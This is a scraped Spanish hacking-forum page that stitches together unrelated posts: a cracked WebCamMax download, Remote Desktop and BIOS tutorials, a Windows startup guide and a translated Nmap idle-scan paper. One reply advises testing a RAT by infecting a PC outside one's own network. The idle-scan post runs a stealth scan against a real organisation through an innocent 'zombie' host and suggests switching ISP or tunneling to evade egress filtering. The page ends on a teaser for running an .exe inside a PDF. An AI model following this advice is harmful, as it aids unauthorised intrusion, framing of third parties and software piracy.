WebCamMax es una excelente aplicación con la que puedes añadir atractivos efectos visuales a la imagen procedente de una webcam.

El programa es compatible con los principales clientes de mensajería instantánea, por lo que podrás compartir las creaciones con tus contactos.
La versión completa incluye más de 1500 efectos distintos, entre ellos marcos, imágenes estáticas, animaciones, división de la pantalla, etcétera.
También, es posible deformar la imagen o aplicar efectos dinámicos sobre éstas, como añadir llamaradas, niebla, lluvia; y mucho más.

Si no tienes cámara web, WebCamMax soporta aquellas aplicaciones que la simulan, por lo que también podrás aplicar efectos a éstas.

WebcamMax funciona con un gran número de aplicaciones de videoconferencia. como MSN Messenger, ICQ, AIM, Skype, Yahoo! Messenger o Camfrog. También tiene soporte para cámaras web virtuales generadas por otra aplicación y puede grabar vídeo y realizar capturas de pantalla.

Video demostrativo:





OS Compatibles: Win2000/XP/Vista/7
27 Mb | Multilenguaje | Medicina Incl

No entiendo como has conectado dos router's

¿Para que quieres un router conectado a otro?


Deberías comprobar puertos, por ejemplo si abres en tu router el puerto 4662 como TCP con un Test de puertos (como por ejemplo eMule) te dirá si tienes el Port abierto o no. En segundo lugar mira de tener actualizado tu No-IP y para comprobar que conecta el RAT remotamente infecta un PC que NO esté conectado a tu Red.



Saludos

Con tu IP pública podrías acceder a tu panel de administración del router, si quieres acceder a distáncia a cualquier de tus ordenadores podrías utililizar herramientas de control remoto tipo Teamviewer, Real VNC etc.



Saludos

Gracias por el aporte, te he añadido los episodios 2 y 3 ya que me dí cuenta de que habían dos más.


Saludos

Una nueva actualización del controlador de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para Linux acaba de ser liberada hace apenas dos días. Dicho You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que va por la versión 295.53, viene con nuevas características y se le añadido soporte para los siguientes chips gráficos:

• GeForce GTX 670
  

• GeForce 605
  

• GeForce GT 610
  

• GeForce GT 630
  

• GeForce GT 640
  

• GeForce GT 645
  

Este controlador, podemos descargarlo en el área You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, donde además encontraremos información sobre como instalarlo. Sin embargo, los usuarios de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login y Linux Mint también pueden agregar el repositorio oficial, de esta forma siempre estaremos actualizados.


El procedimiento es el de siempre, abrimos la terminal, añadimos el repositorio e instalamos:

Citar

sudo add-apt-repository ppa:upubuntu-com/nvidia
sudo apt-get update
sudo apt-get install nvidia-current

Quiero aclarar, que este método no funciona en versiones anteriores a Ubuntu 11.10.


Si quieres saber si tu tarjeta es compatible,  solo tienes que visitar el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login  y seleccionar la pestaña Supported products.


Visto en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Utilizar y manejar una computadora desde otra ubicación de forma remota. Acceder a toda la información y ejecutar todos los programas en dicho equipo. Manual paso por paso para habilitar, crear y configurar una conexión entre dos equipos distantes.





¿Que es la función de Escritorio remoto en Windows?

   
Escritorio remoto es una utilidad de Windows que permite usar y manejar completamente una computadora desde otra ubicación, ya sea distante o cercana, siempre que exista algún tipo de conexión entre ellas.
Antiguamente fue llamada Terminal Services, hoy forma parte del sistema operativo.
La conexión puede ser de cualquiera de las siguientes formas:

• Un cable de red
• Una conexión inalámbrica o Wi-Fi
• Internet


Escritorio remoto nos muestra en el monitor el escritorio de la computadora conectada, ya sea en una ventana con las dimensiones reducidas, las medidas originales de equipo, o a pantalla completa, esto permite sentirnos exactamente igual que si estuviéramos sentados frente a dicho equipo.
Mediante escritorio remoto se pueden usar todos los programas, aplicaciones, archivos y recursos del equipo remoto.
Utilizar escritorio remoto puede ser muy útil en varias situaciones, puede facilitarnos tareas que de otra forma solo puedan ser posibles, accediendo directamente al equipo remoto, algunos ejemplos prácticos que permite su uso son los siguientes:

• Utilizar una PC de escritorio desde una laptop en el mismo hogar conectados ambos por un cable de red.
• Acceder a un equipo que está en el hogar desde el trabajo, aunque sea en una localización distante utilizando internet.
• Lo inverso, acceder a la PC de nuestro trabajo desde un equipo en el hogar u otra ubicación diferente usando internet.


Requisitos para utilizar Escritorio remoto entre dos equipos

Los requisitos indispensables para usar Escritorio remoto entre dos equipos son los siguientes:

Debe existir una conexión de red funcional.
Escritorio remoto debe estar habilitado en ambos equipos.
El equipo que se conecte debe tener permiso para conectarse, para obtener dicho permiso debe aparecer en la lista de usuarios, a no ser que sea Administrador.
El equipo que recibirá la conexión debe estar encendido, no puede estar en estado de suspensión ni de hibernación, por lo que debe configurarse las Opciones de energía en el Panel de control, para que no entre en ninguno de dichos estados de forma automática.


Como configurar los equipos para usar Escritorio remoto

Para comenzar a utilizar Escritorio remoto es necesario configurar previamente el equipo que aceptará la conexión que se establecerá,





• Para permitir conexiones remotas en el equipo al que desea conectarse, da un clic derecho en Mi PC, Propiedadespara abrir Sistema.
• Selecciona Configuración de Acceso remoto.
• Marcar la casilla si no lo está:"Permitir conexiones de Asistencia remota a este equipo".
• En el cuadro Escritorio remotoselecciona la segunda o tercera opción, de acuerdo a la seguridad que necesites para la conexión a usar.
• Presiona Aceptar.
Es imprescindible que el equipo al que necesitamos conectarnos tenga una contraseña para permitir la autentificación de servidor, en muchos casos al instalar Windows en un equipo para uso personal, obviamos su uso, pero para la conexión con Escritorio remoto es necesaria.
Aunque no se utilice en este momento una contraseña, se puede crear una fácilmente.
• Para eso accede en el Panel de control a Cuentas de usuarios y escoge: "Crear una contraseña para la cuenta".


Conectarse a otro equipo usando Escritorio remoto


Si ya se ha configurado correctamente el equipo que recibirá la conexión y están las condiciones técnicas necesarias para conectarte a





• Abre Conexión a Escritorio remoto, para eso escribe o introduce en el cuadro de Inicio: mstsc y oprime la tecla Enter. También puede crearse un acceso directo en el escritorio para facilitar su acceso.
• En Equipo, escribe el nombre del equipo al que desea conectarse o escógelo de la lista, si hay alguno disponible usando la flecha a la derecha.
El nombre asignado a cualquier equipo se puede conocer en la ventana Sistema, también puede utilizarse alternativamente la dirección IP que le corresponda.
• Antes de conectarse, da un clic en el botón Opciones y realiza los cambios necesarios en la configuración usando las fichas Pantalla, Recursos locales, Programas, Experiencia y Opciones avanzadas.
• Para guardar esta configuración para otras conexiones y no tener que introducirlas de nuevo, da un clic en la ficha General y luego en Guardar.
Ahora ya puedes seleccionar Conectar.


¿Cómo mejorar el rendimiento de Escritorio remoto al usar una conexión lenta?


La calidad de la conexión que se logra entre dos equipos es proporcional lógicamente a la velocidad y ancho de banda de la conexión que exista entre ellos.
Es posible utilizar diferentes valores en la configuración, reduciendo los recursos que no son imprescindibles, como efectos visuales que pueden ralentizar y retrasar las órdenes que se introduzcan así como la representación correcta del escritorio del equipo remoto.





• Abre Conexión a Escritorio remoto.
• Da un clic en Opciones y a continuación enRendimiento.
• Elije el tipo de conexión adecuada, si no estás seguro ve probando gradualmente con distintas velocidades hasta dar con la óptima.
• Activa o desactiva las casillas de los efectos visuales que desean usar o mostrar.
Cuantos menos efectos visuales se seleccionen, más rápida será la conexión, es decir que en conexiones lentas es aconsejable desmarcar todas las casillas excepto la última.
• La velocidad de conexión puede aumentar algo si se selecciona: "Almacenamiento en caché persistente de mapas de bits".


Conflictos en la conexión usando Escritorio remoto


El Firewall de Windows restringe la comunicación entre el equipo e Internet, para usar Conexión a Escritorio remoto puede que sea necesario configúralo para permitir dicha conexión.
Para crear dicha reglas haz lo siguiente:

• Abre el Firewall de Windows, para eso escribe o pega en Inicio o en Ejecutar: firewall.cpl y oprime la tecla Enter.
• En el panel izquierdo, da un clic en Permitir un programa o una característica a través de Firewall de Windows.
• Selecciona Cambiar configuración.
• En Programas y características permitidos, activa la casilla "Escritorio remoto" y las que están situadas en el tipo de conexión a utilizar.



Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Configuración del arranque desde el CD/DVD


Para comprobar si el computador es capaz de arrancar desde CD/DVD, simplemente se introduce el CD/DVD en el lector y se reinicia.


Si aparece la pantalla de bienvenida de Tirwal, no es necesario realizar ninguna configuración adicional.


Si el ordenador arranca igual que siempre, seguramente sea necesario activar el arranque desde CD/DVD. A continuación se explica cómo hacerlo en Configuración de la BIOS


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Configuración de la BIOS



Click en las imagenes para ampliar el Tamaño



1. Reiniciar la PC


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


2. Durante el Reinicio aparecera unos numeros para entrar a la “BIOS”


por lo regular son “F2″ “F10″ “F12″ “Supr” o “Esc”


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


3. Se abrira el menu de la “Bios”


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


4. Una ves que estemos en la “Bios Setup” nos desplazmos hacia “Boot”


y cambiamos el orden: poniendo “CD-ROM Drive” al Princio


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


5. Por ultimo Presionar “F10″ y “Enter”para Guardar y salir.


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Datos Adicionales


Cabe mencionar que no todos los menus de la Bios son iguales en ocaciones son diferentes ya que varia la marca del ordenador pero todo esto es muy facil.


Si tienes problemas con la configuracion de la BIOS


ve este Video Tutorial en el que muestro con mas detalles la configuracion.

"Idle Scanning" y algunos juegos relacionados al IPID

Hace casi cuatro años, Antirez (investigador de seguridad) posteó; una nueva innovadora técnica de escaneo de puertos de TCP. Un "Idlescan", como llegó a conocerse, permite un escaneo de puertos completamente invisible. Los atacantes pueden realmente escanear una máquina sin necesidad de enviar ni un sólo paquete al host destino desde su propia dirección! En lugar de ello, un ataque paralelo permite que el escaneo sea una especie de rebote en una máquina inactiva ("zombie") . Los reportes de sistemas de detección de intrusión (IDS) indicarán a la máquina "zombie" como la atacante. Además de ser extraordinariamente invisible, este tipo de escaneo permite mapear la relaciones de confianza basadas en IP entre máquinas.

Asumí que un problema de esta magnitud generaría una respuesta inmediata y parches de parte de los desarrolladores de sistemas operativos. Desafortunadamente, muchos escogieron ignorar el problema por años. Aparentemente, creen que éste es un problema "teórico que no es práctico para ser explotado en el mundo real. Para refutar esa postura, e incrementar la presión sobre los desarrolladores y obligar a que solucionen el problema, he publicado una implementación robusta de un idlescan en versiones recientes de Nmap. Este paper describe la técnica en detalle y ofrece defensas que los administradores de redes, ISPs, y desarrolladores de sistemas operativos pueden utilizar para mitigar esta vulnerabilidad.

Tengan en cuenta que un "idle scanning" es sólo uno de los riesgos de seguridad causados por números de secuencia de IPID predecibles. Este paper describe varios otros ataques de recolección de información posibles gracias a esta característica.

Técnica

Aunque un `idle scanning' es bastante sofisticado en materia de métodos de escaneo de puertos, uno no tiene que ser un experto en TCP/IP para comprenderlo. Sólo se necesita comprender algunas cuestiones básicas:

   
• La mayoría de los servidores esuchan en puertos de TCP, de la manera en la que los servidores de web escuchan en el puerto 80 y los servidores de correo en el puerto 25. Un puerto es considerado "abierto" si alguna aplicación está escuchando en ese puerto, si no, está cerrado.
  
• Una manera de determinar si un puerto esta abierto es envia un paqueter con "SYN" (establecimiento de sesión) al puerto. La máquina destino enviará de vuelta un paquete con "SYN|ACK" (reconocimiento de pedido de sesión) si el puerto está abierto, y un paquete con "RST" si el puerto está cerrado.
  
  
  
        
  • Una máquina que recibe un paquete con "SYN|ACK" no solicitado previamente responderá con una "RST". Pero un "RST" no solicitado previamente es ignorado.
    
  • Cada paquete de IP en Internet tiene un número de "identificación de fragmento". Varios sistemas operativos simplemente incrementan este número por cada paquete que envían. Por lo tanto la observación de este número puede decirle al atacante cuántos paquente han sido enviados desde la última observación.
  Al combinar estas características, es posible escanear una red falsificando nuestra identidad para que parezca que una máquina "zombie" inocente realizó el escaneo. Es más fácil describir esta técnica por medio de un diagrama. En la imagen, debajo, un atacante, A, está escaneando una máquina destino, y a la vez culpando del escaneo a algún zombie, Z. Los cuadrados representan máquinas y las líneas representan paquetes. Breves descripciones en castellano de los paquetes están impresas por encima de las líneas, mientras que las "flags" reales de TCP e información distintiva de los paquetes están impresas debajo de ellas:
  
  
  Como muestra el diagrama, el host destino responde de manera diferente al Zombie dependiendo del estado del puerto. Si el puerto probado está abierto, el destino envía un SYN|ACK al Zombie. El Zombie no esperaba este SYN|ACK, por lo tanto, envía de vuelta un RST. Al enviar este RST, el Zombie hace que se incremente su número de secuencia de IPID. El verdadero atacante detecta esto en el paso 3. Si el puerto está cerrado, el destino envía un RST al Zombie. Los Zombies ignoran este paquete RST no solicitado y no incrementan su número de secuencia de IPID.
  
  Ventajas del Idlescan
  
  Las técnicas de Idlescan ofrecen al atacante muchas ventajas por sobre otros tipos de escaneo populares como los "SYN scans" o los "FIN scans". Es por esto, que recomendamos defensas importantes para ayudar a proteger la red de este ataque. Estas son algunas de las razones, por las cuales los atacantes podrían usar este método de escaneo:
  
  Porque es el más sigiloso? -- Hay muchas técnicas que la gente puede utilizar para camuflar su identidad. Entre ellas, el uso de señuelos (Nmap -D) of escaneos medio-abiertos ("half-open scans", nmap -sS). Pero incluso estas técnicas requieren que el atacante envíe algunos paquetes al destino desde su dirección de IP real. Por otra parte, un Idlescan es completamente invisible -- ningún paquete es enviado al destino desde la verdadera dirección de origen --.
  Como conclusión, se tiene que los sistemas de detección de intrusión (IDS), generalmente, �indicarán y enviarán alertas diciendo que la máquina Zombie ha lanzado un escaneo hacia ellos!.
  
  Vencer routers/firewalls que filtran paquetes -- El filtrado por dirección de IP de origen es un mecanismo de seguridad muy común que sirve para limitar las máquinas que pueden conectarse a un host delicado. Por ejemplo, el servidor de base de datos de una compañía quizás admita conexiones sólo desde el servidor público de web que accede a ella. Un usuario desde su casa quizás sólo permita conexiones de `ssh' (login interactivo) desde sus máquinas del trabajo.
  Un escenario más perturbador ocurre cuando alguien de peso en alguna compañía demanda que los adminstradores de red abran un agujero en el firewall para que él puede acceder a los recursos de la red interna desde la dirección de IP de su casa. Esto puede pasar cuando los ejecutivos no pueden o no tienen ganas de contemplar una alternativa de VPN (red privada virtual) segura.
  
  El "idle scanning" puede ser utilizado con frecuencia para mapear esas relaciones de confianza. El factor clave es que los resultados de un Idlescan listan los puertos abiertos desde la perspectiva del host zombie. Por lo tanto un escaneo normal sobre el servidor de base de datos mencionado anteriormente podría mostrar que no hay puertos abiertos. Pero al realizar un Idlescan utilizando al servidor de web como zombie podría exponerse la relación de confianza al mostrar abiertos los puertos de servicios relacionados a la base de datos.
  
  Mapear estas relaciones de confianza puede ser muy útil para que los atacantes le den prioridad a algunos destinos. El servidor de web distutido anteriormente puede parece algo normal al atacante hasta que nota su acceso especial a la base de datos.
  
  Ejemplos de uso de Nmap
  
  El primer paso es encontrar un host zombie apropiado. El host no debería tener mucho tráfico, (de ahí el nombre Idle, inerte, inactivo ) y debería ofrecer valores de IPID predecibles. Impresoras, máquinas con Windows, hosts con versiones de Linux viejas, FreeBSD, y Mac OS son generalmente útiles. Las últimas versiones de Linux, SOlaris Y OpenBSD son inmunes a ser tratadas como zombies, pero cualquier host puede ser objeto de el escaneo. Una manera de determinar la vulnerabilidad de un host es simplemente probar un Idlescan de Nmap. Nmap comprobará el zombie y reportará si es confiable.
  
  Efectuar estos escaneos es bastante fácil. Simplemente hay que proveer de el nombre del host zombie a la opción -SI y Nmap hace el resto. Este es un ejemplo rápido:
  
  # nmap -P0 -p- -sI You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  Starting nmap V. 3.10ALPHA3 ( You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login )
  Idlescan using zombie You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (192.150.13.111:80); Class: Incremental
  Interesting ports on 208.225.90.120:
  (The 65522 ports scanned but not shown below are in state: closed)
  Port       State       Service
  21/tcp     open        ftp
  25/tcp     open        smtp
  80/tcp     open        http
  111/tcp    open        sunrpc
  135/tcp    open        loc-srv
  443/tcp    open        https
  1027/tcp   open        IIS
  1030/tcp   open        iad1
  2306/tcp   open        unknown
  5631/tcp   open        pcanywheredata
  7937/tcp   open        unknown
  7938/tcp   open        unknown
  36890/tcp  open        unknown
  Nmap run completed -- 1 IP address (1 host up) scanned in 2594.472 seconds
  
  De este escaneo, aprendemos que la RiAA no es muy consciente de la seguridad (se pueden notar abiertos los puertos de "PC Anywhere", "portmapper, Y "Legato nsrexec"). Ya que aparentemente no tienen un firewall, es poco probable que sí tengan un IDS. Pero si lo tienen, mostrará a 'kiosk.adobe.com' como el culpable del escaneo. La opción -P0 previente que Nmap envíe un ping incial a la Máquina de RIAA. Esto disminuye la velocidad del escaneo (hay menos información disponible sobre los tiempos), pero asegura que ningún paquete sea enviado al destino desde nuestra verdadera dirección de IP. El escaneo tardó un largo tiempo porque se escanearon los 65535 puertos -- hay que saltear la opción "-p-" si sólo se quieren escanear los puertos bastante conocidos ("well know ports") además de los puertos 1-1024 --. Uno tiene que asegurarse de encontrar zombies propios -- Kiosk no es muy confiable y es probable que desaparezca o sea monitoreado de cerca --.
  
  Defensas
  
  Afortunadamente, hay varias defensas que pueden ser implementadas para prevenir la mayoría de los ataques relacionados a IPID:
  
  Administradores de Redes:
  
  Los firewalls y "border routers" deberían estar configurados para denegar paquetes entrantes con direcciones de origen extrañas. (por ej. que parezcan venir desde máquinas internas a nuestra red, direcciones reservadas como 10.X.X.X o 192.168.X.X, direcciones localhost 127.X.X.X, etc. Cualquier buena guía de firewalls debería proveer de una orientación más detallada acerca de estas reglas esenciales).
  
  Las reglas de los firewalls que mantienen registro del estado de las conexiones ("Stateful firewalls") pueden ayudar también a este tipo de ataques -- hay que asegurarse de que el firewall ofrezca esta característica y de que esté habilitada --.
  Tratar de utilizar sistemas operativos con secuencias de IPID menos predecibles, como versiones recientes de OpenBSD, SOlaris o Linux. Mientras que esos sistemas operativos son inmunes a convertirse en zombies con la versión actual de Nmap, quizás no frenen todos los ataques relacionados a IPID. Se necesita más investigación.
  Implementar filtrado de salida para prevenir que paquetes forjados con direcciones falsas abandonen nuestra red. Esto previene que nuestros empleados/estudiantes lancen alguno de estos ataques.
  Proveedores de Servicio de Internet (ISPs):
  
  La protección más importante que los ISPs pueden ofrece es utilizar filtrado de salida para prevenir que paquetes forjados con direcciones falsas abandonen nuestra red. Esto previene que los usuarios ejecuten muchos ataques horribles e inclusive, detiene un Idlescan. Además de ayudar al desempeño de Internet, el filtrado de salida puede ahorrartnos costos sustanciales al tener que investigar ataques de "IP spoofing" (engaño de IP).
  
  Desarrolladores de sistemas operativos:
  
  Un buen enfoque es utilizar secuencias de IPID específicas a cada conexión o a cada "peer" (peer: el otro host involucrado en el intercambio de paquetes). Solaris hace esto y limita severamente la información que los atacantes puedan obtener acerca de otras conexiones. Linux 2.4 también utiliza Valores de IPID específicos por cada peer (ver net/ipv4/inetpeer.c). Adicionalmente, Linux 2.4 resetea a cero el campo IPID en paquetes en los que el bit DF ("No fragmentar") está activado. Después de todo, la defragmentación de IP es el único uso crítico del campo ID. Otro enfoque (utilizado por OpenBSD) es generar la secuencia IPID aleatoriamente. Esto es difícil de lograr correctamente -- hay que asegurarse de que la secuencia no se repite y de que cada número no sea utilizado dos veces en un período corto de tiempo --.
  
  Desafíos de Idlescan
  
  Iba a discutir competiciones de implementación para escribir escáners rápidos y precisos. Pero muy pocos de ustedes están haciéndolo, y aquellos que lo hacen, pueden leer la fuente de Nmap y otros escáners. Por lo tanto, sólo remarcaré un cuantos puntos importantes. Esta sección también incluye algunos desafíos encontrados por usuarios de las herramientas.
  
  Desempeño -- Escanear un puerto a la vez (como muestra el diagrama antes visto) puede ser horrendamente lento en el caso de miles de puertos. Nmap maneja esto mandando hasta 100 pruebas. Si Nmap encuentra que la IPID sí se incrementó, limitará la búsqueda de puertos abiertos usando un enfoque de búsqueda binaria.
  
  Hosts no inertes -- Un Idlescan funciona contando el número de paquetes enviados por un zombie y asumiendo que esos paquetes son respuestas a paquetes originados por el destino. Entonces, paquetes extraños enviados por un zombie no inerte pueden causar una confusión importante. Nmap trata de contrarrestar este problema, con retransmisión de las pruebas y otras técnicas para detectar resultados falsos. Por ejemplo, Nmap sabe que algo está mal si prueba 6 puertos y la IPID se incrementa en 10 o 20. Nmap ajusta sus tiempos y paralelismo para compensar hosts que estén ligeramente activos o que descarten (drop) paquetes cuando detecta esto. Sin embargo, Nmap no será confiable con los zombies muy cargados de actividad. Una técnica para manejar zombies muy activos es enviar un gran número (docenas o cientos) de pruebas a cada puerto. Esta técnica de "fuerza bruta" puede ocultar una pequeña cantidad de tráfico de "ruido blanco". Desafortunadamente, el costo es un ancho de banda significativo, escaneos lentos, y la posibilidad de rebalsar con SYNs ("SYN flood") al destino. Thomas Olofsson demostró una herramienta para lograr esto en su presentación en la "2001 Black Hat Briefings". Su presentación (Powerpoint) está disponible aquí.
  Filtrado de salida -- Si no podemos forjar paquetes con direcciones de origen falsas debido al filtrado de salida por parte de tu ISP, intenta con otro ISP o (para usuaros avanzados) se puede probar haciendo un "IP tunneling". También se puede tratar de hacer "rebotar" el ataque desde otra máquina dentro de tu misma red (ya que es poco probable que sea filtrada).
  Zombies inmunes -- Algunos hosts no funcionarán como zombies debido a un sistema operativo astuto o tráfico sustancial. En muchos casos, simplemente se puede utilizar un zombie diferente.
  Más diversión con predicción de IPID
  
  Aunque este paper se enfoca en utilizar secuencias de IPID predecibles para escanear puertos, hay muchas otras maneras retorcias de explotar esta información. Esta es una breve lista:
  
  Análisis de tráfico -- Los números de IPID secuenciales exponen el número de paquetes enviados por un host sobre un cierto período. Esto puede ser usado para estimar el tráfico de un sitio web, determinar cuando se loggea la gente, etc.
  Detección de alias de hosts -- Muchas veces un host tendrá múltiples direcciones de IP o varias interfaces ethernet. Casi siempre se puede determinar cuáles direcciones pertenecen a un cierto host buscando números de secuencia de IPID similares.
  Demultiplexación de equilibrio de Carga ("load balancing") -- ésta es casi la técnica inversa a la previa. Grandes sitios suelen utilizar equipo de equilibrio de carga para que una sóla dirección mapee a una pequeña granja de servidores. Teniendo en cuenta los valores de IPID, se puede, usualmente, determinar cuántas máquinas están detrás del equipo y a cuál estamos conectados. Por ejemplo, los campos "id' en la siguiente ejecución de hping2 ponen en obvia evidencia que You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login es manejada por dos máquinas detrás del equipo de equilibrio de carga (207.46.197.115).
  
  # hing2 -c 10 -i 1 -p 80 -S You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
  HPING You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. (eth0 207.46.197.115): S set, 40 headers + 0 data bytes
  46 bytes from 207.46.197.115: flags=SA seq=0 ttl=56 id=57645 win=16616 rtt=21.2 ms
  46 bytes from 207.46.197.115: flags=SA seq=1 ttl=56 id=57650 win=16616 rtt=21.4 ms
  46 bytes from 207.46.197.115: flags=RA seq=2 ttl=56 id=18574 win=0 rtt=21.3 ms
  46 bytes from 207.46.197.115: flags=RA seq=3 ttl=56 id=18587 win=0 rtt=21.1 ms
  46 bytes from 207.46.197.115: flags=RA seq=4 ttl=56 id=18588 win=0 rtt=21.2 ms
  46 bytes from 207.46.197.115: flags=SA seq=5 ttl=56 id=57741 win=16616 rtt=21.2 ms
  46 bytes from 207.46.197.115: flags=RA seq=6 ttl=56 id=18589 win=0 rtt=21.2 ms
  46 bytes from 207.46.197.115: flags=SA seq=7 ttl=56 id=57742 win=16616 rtt=21.7 ms
  46 bytes from 207.46.197.115: flags=SA seq=8 ttl=56 id=57743 win=16616 rtt=21.6 ms
  46 bytes from 207.46.197.115: flags=SA seq=9 ttl=56 id=57744 win=16616 rtt=21.3 ms
  --- You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. hping statistic ---
  10 packets tramitted, 10 packets received, 0% packet loss
  round-trip min/avg/max = 21.1/21.3/21.7 ms
  
  Detección de sistemas operativos -- Como se discutió anteriormente, los sistemas operativos difieren salvajamente en la manera en la que generan los números de IPID. Nmap utiliza esta información para ayudar a determinar qué versión de sistema operativo se está usando. Más detalles de esta técnica aquí.
  Detección de reglas de firewall -- El valor de IPID puede ayudar a mapear las reglas de firewall. Este es un ejemplo simple:
  Observamos la IPID de la máquina destino detrás del firewall.
  Enviamos un paquete de ping "desde" un host detrás del firewall hacia el mismo destino.
  Observamos la IPID nuevamente. Si se incrementó en 2 (uno por la respuesta al ping y otro por la segunda observación de la IPID), nuestro ping engañoso logró pasar. Algo de Tráfico extraño puede interferir, pero volver a probar puede asegurará precisión. Esta técnica puede ser expandida de varias maneras. Podría (y quizás lo haga) escribir un paper completo describiéndolas. Hay que tener en cuenta que todos los pasos anteriores pueden ser realizados con Hping.
  
  Fuente : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  
  y por ultimo les dejare un video q consegui para q usen idle scan con metasploit ... lo malo es q esta en portugues xD
  
  
  
  me despido ojala les sirva ...
  
  PD: si este post ya lo habian hecho avisarme porfavor
  PD2: igual individualmente podriamos usar el escaneo  con el flag -sS  modo stealth pero posteo este porq es bueno saber  otras maneras de hacer este tipo de scans
  PD3: si no es la seccion del foro para el post avisar tmbn x)
  
  cya
  
  

Autor: R0T53N
Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como conocer todos los programas y aplicaciones que se cargan al inicio de Windows, de forma visible, transparente al usuario e invisible, de forma oculta. Eliminar del arranque elementos indeseados y otros que pueden ser un riesgo para la seguridad del sistema. Herramientas para identificar y administrar de forma efectiva el inicio del sistema operativo.


Existen varios programas o aplicaciones instalados por nosotros de forma voluntaria en la computadora, para facilitarnos el trabajo y la realización de tareas, que adicionalmente a su ejecución o instalación y la mayor parte de las veces sin nuestro consentimiento ni conocimiento, hacen las modificaciones necesarias en la configuración del sistema para iniciarse cada vez que arranque Windows.
La mayor parte de las veces no es con ningún propósito maligno, si no con el objetivo de facilitarnos el funcionamiento rápido de la aplicación, haciendo que se mantenga en la memoria. Esto lógicamente consume recursos, lo que se multiplica cuando son varios los elementos y en definitiva muchas de estas aplicaciones la utilizaremos ocasionalmente, por lo que solo nos servirán de lastre que arrastraremos en cada inicio de Windows.
También existen aplicaciones malignas que de forma inadvertida logran ejecutar la misma función pero con otros propósitos, más oscuros y perjudiciales para nosotros.
En todos los casos tenemos todo nuestro derecho para revisar y decidir todo lo que se inicia con nuestro sistema.
Existen varios métodos para poder conocer todas las aplicaciones que inician con Windows, puede hacerse de forma manual, utilizando las herramientas que incluye Windows, a través de la línea de comandos y por ultimo utilizando herramientas hechas por terceros, lo cual es el modo más fácil y gráficamente el más informativo.
Utilizar Configuración del sistema para conocer aplicaciones que se inician con Windows


Configuración del sistema es una herramienta que incluye Windows, proporciona distintas opciones para configurar el inicio de Windows.
Para abrir Configuración del sistema escribe en el cuadro de Inicio o en Ejecutar: msconfig y oprime Enter.
Escoge la pestaña Inicio de Windows donde aparece la lista de programas y aplicaciones que se inician con el sistema.
Se mostrará una ventana similar a la siguiente.



En cada caso está disponible la siguiente información:
Elemento de inicio (nombre de la aplicación)
Fabricante
Comando (Ruta al ejecutable que inicia la aplicación)
Ubicación (Clave del registro o ruta a la aplicación)


Puedes deseleccionar cualquier elemento que no desees se inicie con el sistema.
Ninguna de las aplicaciones o programas que aparecen aquí listados pertenecen al sistema operativo por lo que no perjudicarán en nada el funcionamiento de Windows, podrás seguirlas utilizando normalmente pero solo cuando decidas y necesites iniciarlas manualmente.


Solo es recomendado mantener en esta lista programas necesarios de cargar en memoria en el arranque de Windows como: Antivirus, Sidebar si utilizas Gadgets, y otras aplicaciones dependiendo del usuario.
En la imagen de ejemplo veras que en este caso se mantiene: Kaspersky, el servidor Apache, feedreader (lector de noticias), Java entre otros.
Claves del Registro de Windows donde se establecen los programas de inicio


La forma preferida del malware es escribir valores en una clave del registro.
Las claves del registro de Windows donde se guardan los valores de las aplicaciones o programas que se inician con el sistema son las siguientes, en ellas se debe revisar en busca de valores escritos sin nuestro consentimiento y que pueden no estar relacionados en la herramienta Configuración del sistema.
En la primera situada en HKCU se guardan valores solo del usuario actual, los valores que aparecen en la otra, HKLM son válidos para todos los usuarios.


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Como iniciar programas o aplicaciones con Windows


Existe una carpeta creada por el sistema operativo para empleo del usuario, donde es posible colocar cualquier elemento con la seguridad que se iniciará con el sistema.
La ruta es la siguiente:

C:\Users\NombreDeUsuario\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Para acceder a ella de una manera fácil escribe en el cuadro de Inicio: shell:Startup y oprime Enter.
La utilidad de esta carpeta es la de permitir al usuario arrastrar a la misma, accesos directos y aplicaciones para lograr su inicio con Windows, pero no será utilizada por virus u otros malware ya que su uso es demasiado evidente.


Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Tras una semana sin entradas en blog, traigo un método de ejecutar .exe en un PDF muy interesante. Cabe destacar que el método no es de mi elaboración.

